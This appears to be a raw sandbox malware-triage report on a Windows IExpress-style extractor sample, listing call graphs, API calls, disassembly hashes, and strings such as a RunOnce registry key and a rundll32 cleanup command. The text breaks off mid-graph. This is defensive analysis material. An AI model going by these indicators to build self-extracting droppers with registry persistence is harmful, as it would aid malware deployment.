2793->2592 2798 7ff7e6e8114c _vsnprintf 2794->2798 2800 7ff7e6e8114c _vsnprintf 2796->2800 2797->2796 2798->2801 2799 7ff7e6e81bd1 2799->2789 2800->2801 2801->2799 2864 7ff7e6e82a6c 2802->2864 2804 7ff7e6e81dce 2803->2804 2805 7ff7e6e82019 2803->2805 2808 7ff7e6e8114c _vsnprintf 2804->2808 2810 7ff7e6e81e25 2804->2810 2806 7ff7e6e88470 7 API calls 2805->2806 2807 7ff7e6e82028 2806->2807 2807->2592 2809 7ff7e6e81dee RegQueryValueExA 2808->2809 2809->2804 2809->2810 2811 7ff7e6e81e29 RegCloseKey 2810->2811 2812 7ff7e6e81e46 GetSystemDirectoryA 2810->2812 2811->2805 2813 7ff7e6e87ba8 CharPrevA 2812->2813 2814 7ff7e6e81e6a LoadLibraryA 2813->2814 2815 7ff7e6e81e86 GetProcAddress FreeLibrary 2814->2815 2816 7ff7e6e81f55 GetModuleFileNameA 2814->2816 2815->2816 2818 7ff7e6e81ebe GetSystemDirectoryA 2815->2818 2817 7ff7e6e81f78 RegCloseKey 2816->2817 2821 7ff7e6e81ee8 2816->2821 2817->2805 2819 7ff7e6e81ed5 2818->2819 2818->2821 2820 7ff7e6e87ba8 CharPrevA 2819->2820 2820->2821 2821->2821 2822 7ff7e6e81f11 LocalAlloc 2821->2822 2823 7ff7e6e81f8e 2822->2823 2824 7ff7e6e81f35 2822->2824 2825 7ff7e6e8114c _vsnprintf 2823->2825 2826 7ff7e6e84dcc 24 API calls 2824->2826 2827 7ff7e6e81fc4 2825->2827 2828 7ff7e6e81f53 2826->2828 2827->2827 2829 7ff7e6e81fcd RegSetValueExA RegCloseKey LocalFree 2827->2829 2828->2817 2829->2805 2831 7ff7e6e848b3 2830->2831 2832 7ff7e6e847c2 WaitForSingleObject GetExitCodeProcess 2830->2832 2891 7ff7e6e87700 GetLastError 2831->2891 2833 7ff7e6e847f9 2832->2833 2840 7ff7e6e82318 18 API calls 2833->2840 2844 7ff7e6e8482a CloseHandle CloseHandle 2833->2844 2835 7ff7e6e848b8 GetLastError FormatMessageA 2836 7ff7e6e84dcc 24 API calls 2835->2836 2838 7ff7e6e8491c 2836->2838 2841 7ff7e6e88470 7 API calls 2838->2841 2839 7ff7e6e848aa 2839->2838 2842 7ff7e6e8484d 2840->2842 2843 7ff7e6e8492f 2841->2843 2842->2844 2843->2592 2844->2838 2844->2839 2846 7ff7e6e87a25 2845->2846 2847 7ff7e6e87ba8 CharPrevA 2846->2847 2848 7ff7e6e87a63 GetFileAttributesA 2847->2848 2849 7ff7e6e87a79 2848->2849 2850 7ff7e6e87a96 LoadLibraryA 2848->2850 2849->2850 2851 7ff7e6e87a7d LoadLibraryExA 2849->2851 2852 7ff7e6e87aa9 2850->2852 2851->2852 2853 7ff7e6e88470 7 API calls 2852->2853 2854 7ff7e6e87ab9 2853->2854 2854->2611 2855->2574 2857 7ff7e6e81609 2856->2857 2859 7ff7e6e81621 2857->2859 2860 7ff7e6e81651 2857->2860 2877 7ff7e6e87ce8 2857->2877 2861 7ff7e6e87ce8 2 API calls 2859->2861 2860->2768 2860->2770 2862 7ff7e6e8162f 2861->2862 2862->2860 2863 7ff7e6e87ce8 2 API calls 2862->2863 2863->2862 2865 7ff7e6e82c24 2864->2865 2866 7ff7e6e82aa0 GetModuleFileNameA 2864->2866 2867 7ff7e6e88470 7 API calls 2865->2867 2866->2865 2876 7ff7e6e82ac8 2866->2876 2869 7ff7e6e82c37 2867->2869 2868 7ff7e6e82acc IsDBCSLeadByte 2868->2876 2869->2799 2870 7ff7e6e82bf6 CharNextA 2872 7ff7e6e82c08 CharNextA 2870->2872 2871 7ff7e6e82af1 CharNextA CharUpperA 2873 7ff7e6e82b9b CharUpperA 2871->2873 2871->2876 2872->2865 2872->2868 2873->2876 2875 7ff7e6e82b36 CharPrevA 2875->2876 2876->2868 2876->2870 2876->2871 2876->2872 2876->2875 2882 7ff7e6e87c40 2876->2882 2880 7ff7e6e87d00 2877->2880 2878 7ff7e6e87d47 2878->2857 2879 7ff7e6e87d0a IsDBCSLeadByte 2879->2878 2879->2880 2880->2878 2880->2879 2881 7ff7e6e87d30 CharNextA 2880->2881 2881->2880 2883 7ff7e6e87c58 2882->2883 2883->2883 2884 7ff7e6e87c61 CharPrevA 2883->2884 2885 7ff7e6e87c7d CharPrevA 2884->2885 2886 7ff7e6e87c75 2885->2886 2887 7ff7e6e87c94 2885->2887 2886->2885 2886->2887 2888 7ff7e6e87c9e CharPrevA 2887->2888 2889 7ff7e6e87cb5 CharNextA 2887->2889 2890 7ff7e6e87cc7 2887->2890 2888->2889 2888->2890 2889->2890 2890->2876 2891->2835 2892->2631 2894 7ff7e6e822eb 2893->2894 2895 7ff7e6e82281 2893->2895 2897 7ff7e6e88470 7 API calls 2894->2897 2896 7ff7e6e87ba8 CharPrevA 2895->2896 2898 7ff7e6e82294 WritePrivateProfileStringA _lopen 2896->2898 2899 7ff7e6e822fd 2897->2899 2898->2894 2900 7ff7e6e822c7 _llseek _lclose 2898->2900 2899->2226 2900->2894 3081 7ff7e6e81500 3082 7ff7e6e81557 GetDesktopWindow 3081->3082 3084 7ff7e6e81530 3081->3084 3083 7ff7e6e84c68 14 API calls 3082->3083 3087 7ff7e6e8156e LoadStringA SetDlgItemTextA MessageBeep 3083->3087 3085 7ff7e6e81553 3084->3085 3086 7ff7e6e81542 EndDialog 3084->3086 3088 7ff7e6e88470 7 API calls 3085->3088 3086->3085 3087->3085 3089 7ff7e6e815d0 3088->3089 3090 7ff7e6e83840 3091 7ff7e6e83852 3090->3091 3094 7ff7e6e8385a 3090->3094 3093 7ff7e6e8388e GetDesktopWindow 3091->3093 3091->3094 3092 7ff7e6e838ec EndDialog 3096 7ff7e6e8385f 3092->3096 3095 7ff7e6e84c68 14 API calls 3093->3095 3094->3092 3094->3096 3097 7ff7e6e838a5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3095->3097 3097->3096 2989 7ff7e6e881b0 __getmainargs 2990 7ff7e6e88b30 _XcptFilter 2943 7ff7e6e858b0 2944 7ff7e6e858ee 2943->2944 2945 7ff7e6e85904 2943->2945 2946 7ff7e6e85770 CloseHandle 2944->2946 2951 7ff7e6e858fc 2944->2951 2948 7ff7e6e85a29 2945->2948 2945->2951 2952 7ff7e6e8591a 2945->2952 2946->2951 2947 7ff7e6e88470 7 API calls 2950 7ff7e6e85af4 2947->2950 2949 7ff7e6e85a35 SetWindowTextA 2948->2949 2953 7ff7e6e85a4a 2948->2953 2949->2953 2951->2947 2952->2951 2954 7ff7e6e85982 DosDateTimeToFileTime 2952->2954 2953->2951 2968 7ff7e6e851bc GetFileAttributesA 2953->2968 2954->2951 2956 7ff7e6e859a3 LocalFileTimeToFileTime 2954->2956 2956->2951 2958 7ff7e6e859c1 SetFileTime 2956->2958 2958->2951 2959 7ff7e6e859e9 2958->2959 2961 7ff7e6e85770 CloseHandle 2959->2961 2960 7ff7e6e85380 29 API calls 2962 7ff7e6e85ab5 2960->2962 2963 7ff7e6e859f2 SetFileAttributesA 2961->2963 2962->2951 2964 7ff7e6e85ac1 2962->2964 2963->2951 2975 7ff7e6e8527c LocalAlloc 2964->2975 2966 7ff7e6e85acb 2966->2951 2969 7ff7e6e8525f 2968->2969 2971 7ff7e6e851de 2968->2971 2969->2951 2969->2960 2970 7ff7e6e85246 SetFileAttributesA 2970->2969 2971->2969 2971->2970 2972 7ff7e6e87ac8 28 API calls 2971->2972 2973 7ff7e6e85228 2972->2973 2973->2969 2973->2970 2974 7ff7e6e8523c 2973->2974 2974->2970 2976 7ff7e6e852aa 2975->2976 2977 7ff7e6e852d4 LocalAlloc 2975->2977 2978 7ff7e6e84dcc 24 API calls 2976->2978 2980 7ff7e6e85300 2977->2980 2982 7ff7e6e852cd 2977->2982 2978->2982 2981 7ff7e6e84dcc 24 API calls 2980->2981 2983 7ff7e6e85323 LocalFree 2981->2983 2982->2966 2983->2982 3000 7ff7e6e833f0 3001 7ff7e6e834ec 3000->3001 3002 7ff7e6e83402 3000->3002 3004 7ff7e6e834f5 SendDlgItemMessageA 3001->3004 3005 7ff7e6e834e5 3001->3005 3003 7ff7e6e8340f 3002->3003 3006 7ff7e6e83441 GetDesktopWindow 3002->3006 3003->3005 3007 7ff7e6e83430 EndDialog 3003->3007 3004->3005 3008 7ff7e6e84c68 14 API calls 3006->3008 3007->3005 3009 7ff7e6e83458 6 API calls 3008->3009 3009->3005 3010 7ff7e6e85870 GlobalAlloc 3011 7ff7e6e878b0 3012 7ff7e6e878fd 3011->3012 3013 7ff7e6e87ba8 CharPrevA 3012->3013 3014 7ff7e6e87935 CreateFileA 3013->3014 3015 7ff7e6e8797e WriteFile 3014->3015 3016 7ff7e6e87970 3014->3016 3017 7ff7e6e879a2 CloseHandle 3015->3017 3019 7ff7e6e88470 7 API calls 3016->3019 3017->3016 3020 7ff7e6e879d5 3019->3020 3021 7ff7e6e84a30 3022 7ff7e6e84a39 SendMessageA 3021->3022 3023 7ff7e6e84a50 3021->3023 3022->3023 3024 7ff7e6e83530 3025 7ff7e6e83557 3024->3025 3026 7ff7e6e83802 EndDialog 3024->3026 3027 7ff7e6e8377e GetDesktopWindow 3025->3027 3028 7ff7e6e83567 3025->3028 3035 7ff7e6e8356b 3026->3035 3029 7ff7e6e84c68 14 API calls 3027->3029 3030 7ff7e6e8357b 3028->3030 3031 7ff7e6e83635 GetDlgItemTextA 3028->3031 3028->3035 3032 7ff7e6e83795 SetWindowTextA SendDlgItemMessageA 3029->3032 3033 7ff7e6e83618 EndDialog 3030->3033 3034 7ff7e6e83584 3030->3034 3040 7ff7e6e8365e 3031->3040 3056 7ff7e6e836e9 3031->3056 3032->3035 3036 7ff7e6e837d8 GetDlgItem EnableWindow 3032->3036 3033->3035 3034->3035 3037 7ff7e6e83591 LoadStringA 3034->3037 3036->3035 3038 7ff7e6e835de 3037->3038 3039 7ff7e6e835bd 3037->3039 3061 7ff7e6e84a60 LoadLibraryA 3038->3061 3044 7ff7e6e84dcc 24 API calls 3039->3044 3043 7ff7e6e83694 GetFileAttributesA 3040->3043 3040->3056 3042 7ff7e6e84dcc 24 API calls 3042->3035 3046 7ff7e6e836fa 3043->3046 3047 7ff7e6e836a8 3043->3047 3060 7ff7e6e835d7 3044->3060 3051 7ff7e6e87ba8 CharPrevA 3046->3051 3049 7ff7e6e84dcc 24 API calls 3047->3049 3048 7ff7e6e835eb SetDlgItemTextA 3048->3035 3048->3039 3052 7ff7e6e836cb 3049->3052 3050 7ff7e6e8374b EndDialog 3050->3035 3053 7ff7e6e8370e 3051->3053 3052->3035 3054 7ff7e6e836d4 CreateDirectoryA 3052->3054 3055 7ff7e6e86b70 31 API calls 3053->3055 3054->3046 3054->3056 3057 7ff7e6e83716 3055->3057 3056->3042 3057->3056 3058 7ff7e6e83721 3057->3058 3059 7ff7e6e86ca4 38 API calls 3058->3059 3058->3060 3059->3060 3060->3035 3060->3050 3062 7ff7e6e84c20 3061->3062 3063 7ff7e6e84aa0 GetProcAddress 3061->3063 3067 7ff7e6e84dcc 24 API calls 3062->3067 3064 7ff7e6e84c0a FreeLibrary 3063->3064 3065 7ff7e6e84ac2 GetProcAddress 3063->3065 3064->3062 3065->3064 3066 7ff7e6e84ae2 GetProcAddress 3065->3066 3066->3064 3068 7ff7e6e84b04 3066->3068 3069 7ff7e6e835e3 3067->3069 3070 7ff7e6e84b13 GetTempPathA 3068->3070 3075 7ff7e6e84b65 3068->3075 3069->3035 3069->3048 3071 7ff7e6e84b2b 3070->3071 3071->3071 3072 7ff7e6e84b34 CharPrevA 3071->3072 3074 7ff7e6e84b4e CharPrevA 3072->3074 3072->3075 3073 7ff7e6e84bee FreeLibrary 3073->3069 3074->3075 3075->3073 3076 7ff7e6e88417 3077 7ff7e6e8842f 3076->3077 3078 7ff7e6e88426 _exit 3076->3078 3079 7ff7e6e88444 3077->3079 3080 7ff7e6e88438 _cexit 3077->3080 3078->3077 3080->3079 3098 7ff7e6e855e0 3099 7ff7e6e85641 ReadFile 3098->3099 3100 7ff7e6e8560d 3098->3100 3099->3100 3101 7ff7e6e857e0 3102 7ff7e6e8581e 3101->3102 3104 7ff7e6e857fc 3101->3104 3103 7ff7e6e8583d SetFilePointer 3102->3103 3102->3104 3103->3104 3105 7ff7e6e833a0 3106 7ff7e6e833ac 3105->3106 3107 7ff7e6e833bb CallWindowProcA 3105->3107 3106->3107 3108 7ff7e6e833b7 3106->3108 3107->3108

                                                                                                        Callgraph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        • Opacity -> Relevance
                                                                                                        • Disassembly available
                                                                                                        callgraph 0 Function_00007FF7E6E88910 1 Function_00007FF7E6E88790 2 Function_00007FF7E6E81C0C 20 Function_00007FF7E6E88470 2->20 50 Function_00007FF7E6E84DCC 2->50 3 Function_00007FF7E6E88494 4 Function_00007FF7E6E81008 5 Function_00007FF7E6E85690 69 Function_00007FF7E6E83B40 5->69 6 Function_00007FF7E6E85D90 46 Function_00007FF7E6E85C60 6->46 6->50 59 Function_00007FF7E6E85050 6->59 7 Function_00007FF7E6E83910 26 Function_00007FF7E6E84C68 7->26 7->50 7->69 8 Function_00007FF7E6E88200 40 Function_00007FF7E6E88964 8->40 47 Function_00007FF7E6E888D0 8->47 56 Function_00007FF7E6E82C54 8->56 9 Function_00007FF7E6E88880 10 Function_00007FF7E6E8527C 10->4 10->50 11 Function_00007FF7E6E88802 12 Function_00007FF7E6E824F8 12->20 12->50 52 Function_00007FF7E6E8114C 12->52 13 Function_00007FF7E6E81684 13->4 15 Function_00007FF7E6E81084 13->15 13->20 25 Function_00007FF7E6E82A6C 13->25 28 Function_00007FF7E6E815E8 13->28 29 Function_00007FF7E6E87D68 13->29 13->50 13->52 76 Function_00007FF7E6E87BA8 13->76 14 Function_00007FF7E6E87F04 14->20 16 Function_00007FF7E6E85380 16->50 17 Function_00007FF7E6E87700 18 Function_00007FF7E6E81500 18->20 18->26 19 Function_00007FF7E6E87E00 20->3 21 Function_00007FF7E6E88870 22 Function_00007FF7E6E830EC 22->6 22->17 22->20 32 Function_00007FF7E6E83F74 22->32 42 Function_00007FF7E6E85FE4 22->42 22->50 53 Function_00007FF7E6E8494C 22->53 54 Function_00007FF7E6E87AC8 22->54 63 Function_00007FF7E6E840C4 22->63 64 Function_00007FF7E6E866C4 22->64 73 Function_00007FF7E6E8772C 22->73 22->76 86 Function_00007FF7E6E82318 22->86 90 Function_00007FF7E6E86CA4 22->90 91 Function_00007FF7E6E860A4 22->91 23 Function_00007FF7E6E861EC 23->20 49 Function_00007FF7E6E8204C 23->49 67 Function_00007FF7E6E87C40 23->67 24 Function_00007FF7E6E812EC 24->20 51 Function_00007FF7E6E811CC 24->51 25->4 25->20 25->67 26->20 27 Function_00007FF7E6E87CE8 28->27 30 Function_00007FF7E6E82468 30->20 30->50 31 Function_00007FF7E6E83BF4 31->14 31->20 31->50 79 Function_00007FF7E6E87E34 31->79 80 Function_00007FF7E6E82834 31->80 32->17 32->50 32->54 32->59 33 Function_00007FF7E6E85770 34 Function_00007FF7E6E86B70 34->4 34->17 34->50 34->76 35 Function_00007FF7E6E833F0 35->26 36 Function_00007FF7E6E879F0 36->20 36->76 37 Function_00007FF7E6E85870 38 Function_00007FF7E6E88B60 39 Function_00007FF7E6E88A62 93 Function_00007FF7E6E88A9C 39->93 41 Function_00007FF7E6E864E4 41->17 41->20 41->34 62 Function_00007FF7E6E863B8 41->62 41->76 41->90 42->50 42->59 42->73 43 Function_00007FF7E6E855E0 44 Function_00007FF7E6E857E0 45 Function_00007FF7E6E84A60 45->4 45->50 46->16 46->20 46->33 47->9 71 Function_00007FF7E6E88930 47->71 48 Function_00007FF7E6E88750 49->15 49->20 49->49 49->76 50->4 50->14 50->20 50->52 50->79 51->20 53->50 53->59 54->50 55 Function_00007FF7E6E88648 55->3 56->2 56->22 56->23 56->50 78 Function_00007FF7E6E82DB4 56->78 56->86 57 Function_00007FF7E6E880D0 57->21 89 Function_00007FF7E6E88818 57->89 58 Function_00007FF7E6E87850 60 Function_00007FF7E6E851BC 60->54 61 Function_00007FF7E6E8473C 61->17 61->20 61->50 61->86 62->4 62->20 62->52 62->76 63->13 63->17 63->20 63->36 63->50 63->52 63->59 63->61 75 Function_00007FF7E6E81D28 63->75 63->76 64->17 64->20 64->30 64->41 64->50 64->54 64->59 64->76 64->90 65 Function_00007FF7E6E82244 65->20 65->76 66 Function_00007FF7E6E887BC 68 Function_00007FF7E6E83840 68->26 70 Function_00007FF7E6E881B0 72 Function_00007FF7E6E88B30 73->20 73->52 74 Function_00007FF7E6E8512C 74->4 74->15 75->20 75->50 75->52 75->76 76->15 77 Function_00007FF7E6E870A8 77->20 77->27 77->29 77->50 77->55 77->76 92 Function_00007FF7E6E87024 77->92 78->20 78->24 78->31 78->49 78->50 78->54 78->59 78->77 85 Function_00007FF7E6E8261C 80->85 81 Function_00007FF7E6E858B0 81->10 81->16 81->20 81->33 81->60 81->74 87 Function_00007FF7E6E85B18 81->87 82 Function_00007FF7E6E878B0 82->20 82->76 83 Function_00007FF7E6E84A30 84 Function_00007FF7E6E83530 84->26 84->34 84->45 84->50 84->76 84->90 85->4 85->20 85->76 86->65 88 Function_00007FF7E6E88417 89->66 90->12 90->17 90->20 90->50 91->17 91->50 91->59 94 Function_00007FF7E6E833A0

                                                                                                        Executed Functions

                                                                                                        Function 00007FF7E6E840C4 Relevance: 54.6, APIs: 17, Strings: 14, Instructions: 371libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 7ff7e6e840c4-7ff7e6e84116 1 7ff7e6e84139-7ff7e6e84141 0->1 2 7ff7e6e84118-7ff7e6e84133 call 7ff7e6e85050 0->2 4 7ff7e6e84145-7ff7e6e84167 memset 1->4 2->1 9 7ff7e6e84254-7ff7e6e8427d call 7ff7e6e84dcc 2->9 6 7ff7e6e8416d-7ff7e6e84188 call 7ff7e6e85050 4->6 7 7ff7e6e84282-7ff7e6e84295 4->7 6->9 17 7ff7e6e8418e-7ff7e6e84194 6->17 8 7ff7e6e84299-7ff7e6e842a3 7->8 11 7ff7e6e842b7-7ff7e6e842c2 8->11 12 7ff7e6e842a5-7ff7e6e842ab 8->12 19 7ff7e6e844ee 9->19 16 7ff7e6e842c5-7ff7e6e842c8 11->16 12->11 15 7ff7e6e842ad-7ff7e6e842b5 12->15 15->8 15->11 20 7ff7e6e842ca-7ff7e6e842e2 call 7ff7e6e85050 16->20 21 7ff7e6e84328-7ff7e6e8433d call 7ff7e6e81684 16->21 22 7ff7e6e8419d-7ff7e6e841a0 17->22 23 7ff7e6e84196-7ff7e6e8419b 17->23 24 7ff7e6e844f0-7ff7e6e8451f call 7ff7e6e88470 19->24 20->9 37 7ff7e6e842e8-7ff7e6e842ef 20->37 21->19 38 7ff7e6e84343-7ff7e6e8434a 21->38 27 7ff7e6e841ad-7ff7e6e841af 22->27 28 7ff7e6e841a2-7ff7e6e841ab 22->28 26 7ff7e6e841b5 23->26 32 7ff7e6e841b8-7ff7e6e841bb 26->32 27->32 33 7ff7e6e841b1 27->33 28->26 32->16 35 7ff7e6e841c1-7ff7e6e841cb 32->35 33->26 39 7ff7e6e841cd-7ff7e6e841d0 35->39 40 7ff7e6e84231-7ff7e6e84234 35->40 41 7ff7e6e845d8-7ff7e6e845df 37->41 42 7ff7e6e842f5-7ff7e6e84322 CompareStringA 37->42 43 7ff7e6e8434c-7ff7e6e84353 38->43 44 7ff7e6e8436a-7ff7e6e8436c 38->44 46 7ff7e6e841db-7ff7e6e841dd 39->46 47 7ff7e6e841d2-7ff7e6e841d9 39->47 40->21 52 7ff7e6e8423a-7ff7e6e84252 call 7ff7e6e85050 40->52 48 7ff7e6e8472d-7ff7e6e8472f 41->48 49 7ff7e6e845e5-7ff7e6e845ec 41->49 42->21 42->41 43->44 45 7ff7e6e84355-7ff7e6e8435c 43->45 50 7ff7e6e84493-7ff7e6e8449b 44->50 51 7ff7e6e84372-7ff7e6e84379 44->51 45->44 53 7ff7e6e8435e-7ff7e6e84360 45->53 46->19 55 7ff7e6e841e3 46->55 54 7ff7e6e841ea-7ff7e6e841fb call 7ff7e6e85050 47->54 48->24 49->48 56 7ff7e6e845f2-7ff7e6e84621 RegOpenKeyExA 49->56 59 7ff7e6e8449d-7ff7e6e844a4 call 7ff7e6e8473c 50->59 60 7ff7e6e844df-7ff7e6e844e9 LocalFree 50->60 57 7ff7e6e84599-7ff7e6e845d3 call 7ff7e6e84dcc LocalFree 51->57 58 7ff7e6e8437f-7ff7e6e84381 51->58 52->9 52->16 53->51 63 7ff7e6e84362-7ff7e6e84365 call 7ff7e6e81d28 53->63 54->9 78 7ff7e6e841fd-7ff7e6e8422d CompareStringA 54->78 55->54 56->48 64 7ff7e6e84627-7ff7e6e84666 RegQueryValueExA 56->64 57->19 58->50 66 7ff7e6e84387-7ff7e6e8438e 58->66 75 7ff7e6e844a9-7ff7e6e844ab 59->75 60->19 63->44 71 7ff7e6e8471c-7ff7e6e84728 RegCloseKey 64->71 72 7ff7e6e8466c-7ff7e6e8469b memset GetSystemDirectoryA 64->72 66->50 74 7ff7e6e84394-7ff7e6e8439f call 7ff7e6e879f0 66->74 71->48 76 7ff7e6e8469d-7ff7e6e846ae call 7ff7e6e87ba8 72->76 77 7ff7e6e846b3-7ff7e6e846dc call 7ff7e6e8114c 72->77 86 7ff7e6e843a5-7ff7e6e843c1 GetProcAddress 74->86 87 7ff7e6e84574-7ff7e6e84597 call 7ff7e6e84dcc 74->87 75->60 80 7ff7e6e844ad-7ff7e6e844c3 LocalFree 75->80 76->77 88 7ff7e6e846e3-7ff7e6e846ea 77->88 78->40 80->41 84 7ff7e6e844c9-7ff7e6e844ce 80->84 84->4 89 7ff7e6e843c7-7ff7e6e84415 86->89 90 7ff7e6e84521-7ff7e6e8454e call 7ff7e6e84dcc FreeLibrary 86->90 100 7ff7e6e84553-7ff7e6e8456f LocalFree call 7ff7e6e87700 87->100 88->88 93 7ff7e6e846ec-7ff7e6e84717 RegSetValueExA 88->93 94 7ff7e6e84417-7ff7e6e8441b 89->94 95 7ff7e6e8441f-7ff7e6e84427 89->95 90->100 93->71 94->95 98 7ff7e6e84429-7ff7e6e8442d 95->98 99 7ff7e6e84431-7ff7e6e84433 95->99 98->99 101 7ff7e6e8443d-7ff7e6e84445 99->101 102 7ff7e6e84435-7ff7e6e84439 99->102 100->19 104 7ff7e6e84447-7ff7e6e8444b 101->104 105 7ff7e6e8444f-7ff7e6e84451 101->105 102->101 104->105 107 7ff7e6e8445b-7ff7e6e8447e 105->107 108 7ff7e6e84453-7ff7e6e84457 105->108 110 7ff7e6e844d3-7ff7e6e844da FreeLibrary 107->110 111 7ff7e6e84480-7ff7e6e84491 FreeLibrary 107->111 108->107 110->60 111->80
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                        • String ID: <None>$ADMQCMD$Adv$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                        • API String ID: 2679723528-151385680
                                                                                                        • Opcode ID: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                                                        • Instruction ID: 96d120f3e714eb5deb84fe091a524bf5a5a7bcfad9180fc3b0746b83a77b642a
                                                                                                        • Opcode Fuzzy Hash: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                                                        • Instruction Fuzzy Hash: A7024D71A287C286E760AB14AC407BBB7A0FB85B44F980137DA8E4B6D4DF3CD545C722
                                                                                                        Function 00007FF7E6E81D28 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 183registrylibrarymemoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                        • String ID: %s /D:%s$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                        • API String ID: 178549006-2414900631
                                                                                                        • Opcode ID: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                                                        • Instruction ID: 98f9c922f839c46493925be2bdf45b9b7ccce9e455f87b8d3c9ac0e3af25e634
                                                                                                        • Opcode Fuzzy Hash: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                                                        • Instruction Fuzzy Hash: 1B813C32A28AC686E710AB55E8443BAB7A1FB89F54F885132DA8E0B7D4DF3CD505C711
                                                                                                        Function 00007FF7E6E81684 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 350memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 144 7ff7e6e81684-7ff7e6e816ce 145 7ff7e6e816d3-7ff7e6e816dd 144->145 146 7ff7e6e816f2-7ff7e6e81704 145->146 147 7ff7e6e816df-7ff7e6e816e5 145->147 149 7ff7e6e81706-7ff7e6e81711 146->149 150 7ff7e6e81713-7ff7e6e8171a 146->150 147->146 148 7ff7e6e816e7-7ff7e6e816f0 147->148 148->145 148->146 151 7ff7e6e8171e-7ff7e6e8173c call 7ff7e6e815e8 149->151 150->151 154 7ff7e6e8173e 151->154 155 7ff7e6e817aa-7ff7e6e817c2 151->155 157 7ff7e6e81741-7ff7e6e81748 154->157 156 7ff7e6e817c7-7ff7e6e817d1 155->156 158 7ff7e6e817e6-7ff7e6e817ff call 7ff7e6e87ba8 156->158 159 7ff7e6e817d3-7ff7e6e817d9 156->159 157->157 160 7ff7e6e8174a-7ff7e6e8174e 157->160 164 7ff7e6e81804-7ff7e6e81814 call 7ff7e6e87d68 158->164 159->158 161 7ff7e6e817db-7ff7e6e817e4 159->161 160->155 163 7ff7e6e81750-7ff7e6e81757 160->163 161->156 161->158 165 7ff7e6e8175e-7ff7e6e81760 163->165 166 7ff7e6e81759-7ff7e6e8175c 163->166 174 7ff7e6e81a1b-7ff7e6e81a2b call 7ff7e6e87d68 164->174 175 7ff7e6e8181a-7ff7e6e81847 CompareStringA 164->175 165->155 167 7ff7e6e81762-7ff7e6e81764 165->167 166->165 169 7ff7e6e81766-7ff7e6e81776 166->169 167->155 167->169 170 7ff7e6e8177b-7ff7e6e81785 169->170 172 7ff7e6e8179a-7ff7e6e817a8 170->172 173 7ff7e6e81787-7ff7e6e8178d 170->173 172->164 173->172 177 7ff7e6e8178f-7ff7e6e81798 173->177 184 7ff7e6e81acb-7ff7e6e81ae9 LocalAlloc 174->184 185 7ff7e6e81a31-7ff7e6e81a5e CompareStringA 174->185 175->174 176 7ff7e6e8184d-7ff7e6e81861 GetFileAttributesA 175->176 179 7ff7e6e81867-7ff7e6e8186f 176->179 180 7ff7e6e819f3-7ff7e6e819fb 176->180 177->170 177->172 179->180 182 7ff7e6e81875-7ff7e6e81891 call 7ff7e6e815e8 179->182 183 7ff7e6e81a00-7ff7e6e81a16 call 7ff7e6e84dcc 180->183 197 7ff7e6e818b5-7ff7e6e818d1 LocalAlloc 182->197 198 7ff7e6e81893-7ff7e6e818b0 call 7ff7e6e815e8 182->198 199 7ff7e6e81bda-7ff7e6e81c03 call 7ff7e6e88470 183->199 188 7ff7e6e81aeb-7ff7e6e81aff 